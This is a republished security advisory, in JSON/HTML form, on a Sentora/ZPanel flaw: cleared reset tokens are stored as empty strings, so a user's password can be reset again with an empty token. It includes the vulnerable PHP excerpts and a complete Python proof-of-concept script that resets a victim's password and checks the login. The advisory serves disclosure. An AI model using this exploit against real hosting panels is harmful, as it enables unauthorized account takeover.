{"id":9485,"date":"2017-09-24T14:19:18","date_gmt":"2017-09-24T22:19:18","guid":{"rendered":"http:\/\/www.palada.net\/index.php\/2017\/09\/24\/news-3258\/"},"modified":"2017-09-24T14:19:18","modified_gmt":"2017-09-24T22:19:18","slug":"news-3258","status":"publish","type":"post","link":"https:\/\/www.palada.net\/index.php\/2017\/09\/24\/news-3258\/","title":{"rendered":"SSD Advisory \u2013 Sentora \/ ZPanel Password Reset Vulnerability"},"content":{"rendered":"<p><strong>Credit to Author: SSD \/ Maor Schwartz | Date: Sun, 24 Sep 2017 07:58:32 +0000<\/strong><\/p>\n<div class=\"entry-content\">\n<div class=\"pf-content\">\n<p><strong>Vulnerability Summary<\/strong><br \/> The following advisory describes a password reset vulnerability found in Sentora \/ ZPanel.<\/p>\n<p>Sentora is &#8220;a free to download and use web hosting control panel developed for Linux, UNIX and BSD based servers or computers. The Sentora software can turn a domestic or commercial server into a fully fledged, easy to use and manage web hosting server&#8221;.<\/p>\n<p>ZPanel is a free to download and use Web hosting control panel written to work effortlessly with Microsoft Windows and POSIX (Linux, UNIX and MacOSX) based servers or computers. 
This solution can turn a home or professional server into a fully fledged, easy to use and manage web hosting server.<\/p>\n<p><strong>Credit<\/strong><br \/> An independent security researcher has reported this vulnerability to Beyond Security\u2019s SecuriTeam Secure Disclosure program.<\/p>\n<p><strong>Vendor response<\/strong><br \/> Hostwinds was informed of the vulnerability, to which they responded with &#8220;Zpanel is owned by Hostwinds but is no longer in production and has not been supported for some time now. We only keep it active as a legacy control panel and strongly discourage clients from using it. If you would like to continue to use it that is agreeable, but we are not able to offer any kind of support for it other than installing a different control panel over it.&#8221;<\/p>\n<p>Sentora was informed of the vulnerability on July 16 2017. While acknowledging receipt of the vulnerability information, they failed to respond to the technical claims, provide a fix timeline or coordinate an advisory with us.<\/p>\n<p><span id=\"more-3386\"><\/span><\/p>\n<p><strong>Vulnerability details<\/strong><br \/> A design flaw in the way Sentora \/ ZPanel validates the reset token allows an attacker to reset the victim\u2019s password.<\/p>\n<p>The handler of the &#8220;forgot password&#8221; functionality is:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac98a629152588\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px 
!important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ sentora\/inc\/init.inc.php ]\n\n    43\tif (isset($_POST['inForgotPassword'])) {\n    44\t    runtime_csfr::Protect();\n    45\t    $randomkey = runtime_randomstring::randomHash();\n   &#8230;\n    53\t        $zdbh-&gt;exec(\"UPDATE x_accounts SET ac_resethash_tx = '\" . $randomkey . \"' WHERE ac_id_pk=\" . $result['ac_id_pk'] . \"\");\n   &#8230;\n    68\t        $phpmailer-&gt;Body = \"Hi \" . $result['ac_user_vc'] . \",\n    69\t\n    70\tYou, or somebody pretending to be you, has requested a password reset link to be sent for your web hosting control panel login.\n    71\t\n    72\tIf you wish to proceed with the password reset on your account, please use the link below to be taken to the password reset page.\n    73\t\n    74\t\" . $protocol . $domain . \"\/?resetkey=\" . $randomkey . \"\n    75\t\n    76\t\n    77\t                \";<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">  \t\t\t\t  \t\t\t<\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0022 seconds] -->  <\/p>\n<p>It generates the reset token <em>ac_resethash_tx<\/em> and sends an email with a reset link to the user.<\/p>\n<p>The user then returns via this link and fills in the reset form:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac995322083492\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div 
class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> [ sentora\/inc\/init.inc.php ]\n\n    84\tif (isset($_POST['inConfEmail'])) {\n   &#8230;\n    86\t    $sql = $zdbh-&gt;prepare(\"SELECT ac_id_pk FROM x_accounts WHERE ac_email_vc = :email AND ac_resethash_tx = :resetkey AND ac_resethash_tx IS NOT NULL AND ac_deleted_ts IS NULL\");\n   &#8230;\n    93\t    $crypto-&gt;SetPassword($_POST['inNewPass']);\n   &#8230;\n    99\t        $sql = $zdbh-&gt;prepare(\"UPDATE x_accounts SET ac_resethash_tx = '', ac_pass_vc = :password, ac_passsalt_vc = :salt WHERE ac_id_pk = :uid\");<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0013 seconds] -->  <\/p>\n<p>The reset token is checked and, if it matches, the password is set to the requested new password and the reset token is invalidated.<\/p>\n<p>The problem is that when the token is invalidated it is not set to <em>NULL<\/em> as it should be; instead it is set to an empty string. An empty string still satisfies the <em>ac_resethash_tx IS NOT NULL<\/em> condition in the query above.<\/p>\n<p>This means that if a user has used password reset, anyone can reset his password again with an empty token. 
We only need to know his email address, which is only used to identify the user; no email is sent to that address.<\/p>\n<p><strong>Proof of Concept<\/strong><br \/> Usage:<\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac998767877559\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> resetagain.py http:\/\/target\/ email newpassword [username]<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\"><\/div>\n<\/p><\/div>\n<p>  <!-- [Format Time: 0.0002 seconds] -->  <\/p>\n<\/p>\n<p><!-- Crayon Syntax Highlighter v_2.7.2_beta -->    \t\t<\/p>\n<div id=\"crayon-59c82f65ac99b844907907\" class=\"crayon-syntax crayon-theme-classic crayon-font-monaco crayon-os-pc print-yes notranslate\" data-settings=\" minimize scroll-mouseover\" style=\" margin-top: 12px; margin-bottom: 12px; font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-toolbar\" data-settings=\" mouseover overlay hide delay\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\"><span class=\"crayon-title\"><\/span>  \t\t\t<\/p>\n<div class=\"crayon-tools\" style=\"font-size: 12px !important;height: 18px !important; line-height: 18px !important;\">\n<div class=\"crayon-button crayon-nums-button\" title=\"Toggle Line Numbers\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button 
crayon-plain-button\" title=\"Toggle Plain Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-wrap-button\" title=\"Toggle Line Wrap\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-expand-button\" title=\"Expand Code\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-copy-button\" title=\"Copy\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<div class=\"crayon-button crayon-popup-button\" title=\"Open Code In New Window\">\n<div class=\"crayon-button-icon\"><\/div>\n<\/div>\n<\/div>\n<\/div>\n<div class=\"crayon-info\" style=\"min-height: 16.8px !important; line-height: 16.8px !important;\"><\/div>\n<div class=\"crayon-plain-wrap\"><textarea wrap=\"soft\" class=\"crayon-plain print-no\" data-settings=\"dblclick\" readonly style=\"-moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4; font-size: 12px !important; line-height: 15px !important;\"> #!\/usr\/bin\/env python3  # pylint: disable=C0103  #  # requires requests and lxml library  # pip3 install requests lxml  #  import sys  from urllib.parse import urljoin  import lxml.html  import requests    try:      requests.packages.urllib3.disable_warnings(requests.packages.urllib3.exceptions.InsecureRequestWarning)  except:      pass    if len(sys.argv) &lt; 4:      print(&#8220;&#8221;)      print(&#8220;usage:&#8221;)      print(&#8220;%s http:\/\/target\/ email newpassword [username]&#8221; % sys.argv[0])      print(&#8220;&#8221;)      print(&#8220;If username is specified then login will be attempted to verify password change.&#8221;)      print(&#8220;&#8221;)      sys.exit()    TARGET = sys.argv[1]  USER_EMAIL = sys.argv[2]  USER_NEWPASS = sys.argv[3]  USER_NAME = sys.argv[4] if len(sys.argv) &gt; 4 else &#8220;&#8221;      def get_form(getpath, formname, params=None):      resp = session.get(urljoin(TARGET, getpath), params=params)      tree = 
lxml.html.fromstring(resp.content)      form = tree.xpath(&#8216;\/\/form[@name=&#8221;%s&#8221;]&#8217; % formname)      if not form:          return None      form = form[0]      formdata = {}      for element in form.xpath(&#8216;.\/\/input&#8217;):          formdata[element.name] = element.value if element.value else &#8220;&#8221;      return (form.action, formdata)      def post_form(formaction, data, params=None):      return session.post(urljoin(TARGET, formaction), params=params, data=data, allow_redirects=False)      session = requests.Session()  session.verify = False    print(&#8220;Get reset form&#8221;)  form = get_form(&#8220;\/&#8221;, &#8220;frmZConfirm&#8221;, {&#8220;resetkey&#8221;: &#8220;dummy&#8221;})    print(&#8220;Reset password&#8221;)  formaction, formdata = form  formdata[&#8220;inConfEmail&#8221;] = USER_EMAIL  formdata[&#8220;inNewPass&#8221;] = formdata[&#8220;inputNewPass2&#8221;] = USER_NEWPASS  resp = post_form(formaction, formdata, {&#8220;resetkey&#8221;: &#8220;&#8221;})    if USER_NAME:      #session.cookies.clear()      print(&#8220;Test login&#8221;)      print(&#8220;Get login form&#8221;)      form = get_form(&#8220;\/&#8221;, &#8220;frmZLogin&#8221;)        print(&#8220;Login&#8221;)      formaction, formdata = form      formdata[&#8220;inUsername&#8221;] = USER_NAME      formdata[&#8220;inPassword&#8221;] = USER_NEWPASS      resp = post_form(formaction, formdata)      if &#8220;invalidlogin&#8221; in resp.headers.get(&#8220;location&#8221;, &#8220;&#8221;):          print(&#8220;Failed!&#8221;)          sys.exit()      print(&#8220;OK&#8221;)      session.get(urljoin(TARGET, &#8220;\/?logout&#8221;))<\/textarea><\/div>\n<div class=\"crayon-main\" style=\"\">\n<table class=\"crayon-table\">\n<tr class=\"crayon-row\">\n<td class=\"crayon-nums\" data-settings=\"show\">\n<div class=\"crayon-nums-content\" style=\"font-size: 12px !important; line-height: 15px !important;\">\n<div class=\"crayon-num\" 
data-line=\"crayon-59c82f65ac99b844907907-64\">64<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-65\">65<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-66\">66<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-67\">67<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-68\">68<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-69\">69<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-70\">70<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-71\">71<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-72\">72<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-73\">73<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-74\">74<\/div>\n<div class=\"crayon-num\" data-line=\"crayon-59c82f65ac99b844907907-75\">75<\/div>\n<div class=\"crayon-num crayon-striped-num\" data-line=\"crayon-59c82f65ac99b844907907-76\">76<\/div>\n<\/div>\n<\/td>\n<td class=\"crayon-code\">\n<div class=\"crayon-pre\" style=\"font-size: 12px !important; line-height: 15px !important; -moz-tab-size:4; -o-tab-size:4; -webkit-tab-size:4; tab-size:4;\">\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-1\"><span class=\"crayon-p\">#!\/usr\/bin\/env python3<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-2\"><span class=\"crayon-p\"># pylint: disable=C0103<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-3\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-4\"><span class=\"crayon-p\"># requires requests and lxml library<\/span><\/div>\n<div class=\"crayon-line\" 
id=\"crayon-59c82f65ac99b844907907-5\"><span class=\"crayon-p\"># pip3 install requests lxml<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-6\"><span class=\"crayon-p\">#<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-7\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">sys<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-8\"><span class=\"crayon-e\">from <\/span><span class=\"crayon-v\">urllib<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">parse <\/span><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">urljoin<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-9\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">html<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-10\"><span class=\"crayon-e\">import <\/span><span class=\"crayon-e\">requests<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-11\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-12\"><span class=\"crayon-st\">try<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-13\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">disable_warnings<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">requests<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">packages<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">urllib3<\/span><span 
class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">exceptions<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">InsecureRequestWarning<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-14\"><span class=\"crayon-v\">except<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-15\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">pass<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-16\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-17\"><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">&lt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-18\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-19\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;usage:&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-20\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span
class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;%s http:\/\/target\/ email newpassword [username]&quot;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">0<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-21\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-22\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;If username is specified then login will be attempted to verify password change.&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-23\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-e\">print<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&quot;&quot;<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-24\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">exit<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-25\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-26\"><span class=\"crayon-v\">TARGET<\/span><span
class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">1<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-27\"><span class=\"crayon-v\">USER_EMAIL<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">2<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-28\"><span class=\"crayon-v\">USER_NEWPASS<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">3<\/span><span class=\"crayon-sy\">]<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-29\"><span class=\"crayon-v\">USER_NAME<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">[<\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-sy\">]<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-e\">len<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">sys<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">argv<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-h\"> <\/span><span 
class=\"crayon-o\">&gt;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-cn\">4<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">else<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-s\">&quot;&quot;<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-30\">&nbsp;<\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-31\">&nbsp;<\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-32\"><span class=\"crayon-e\">def <\/span><span class=\"crayon-e\">get_form<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">getpath<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formname<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">None<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-33\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">session<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">get<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-e\">urljoin<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">TARGET<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">getpath<\/span><span class=\"crayon-sy\">)<\/span><span class=\"crayon-sy\">,<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-v\">params<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\"
id=\"crayon-59c82f65ac99b844907907-34\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">lxml<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">html<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">fromstring<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-v\">resp<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-v\">content<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-35\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">=<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">tree<\/span><span class=\"crayon-sy\">.<\/span><span class=\"crayon-e\">xpath<\/span><span class=\"crayon-sy\">(<\/span><span class=\"crayon-s\">&#039;\/\/form[@name=&quot;%s&quot;]&#039;<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-o\">%<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">formname<\/span><span class=\"crayon-sy\">)<\/span><\/div>\n<div class=\"crayon-line crayon-striped-line\" id=\"crayon-59c82f65ac99b844907907-36\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">if<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-st\">not<\/span><span class=\"crayon-h\"> <\/span><span class=\"crayon-v\">form<\/span><span class=\"crayon-o\">:<\/span><\/div>\n<div class=\"crayon-line\" id=\"crayon-59c82f65ac99b844907907-37\"><span class=\"crayon-h\">&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;&nbsp;<\/span><span class=\"crayon-st\">return<\/span><span class=\"crayon-h\"> <\/span><span 